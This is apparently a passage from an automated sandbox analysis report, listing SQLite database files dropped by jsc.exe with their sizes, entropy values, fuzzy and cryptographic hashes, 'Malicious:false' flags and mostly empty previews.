                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.137181696973627
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1215420383712111
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
